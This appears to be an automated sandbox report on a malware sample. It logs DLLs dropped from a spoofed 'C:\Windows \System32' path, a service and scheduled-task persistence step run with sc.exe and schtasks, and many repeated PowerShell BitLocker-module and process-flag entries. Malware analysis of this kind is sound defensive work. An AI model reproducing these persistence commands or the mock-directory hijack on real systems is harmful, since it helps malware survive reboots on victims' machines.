Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvc.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Creates or modifies windows services
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
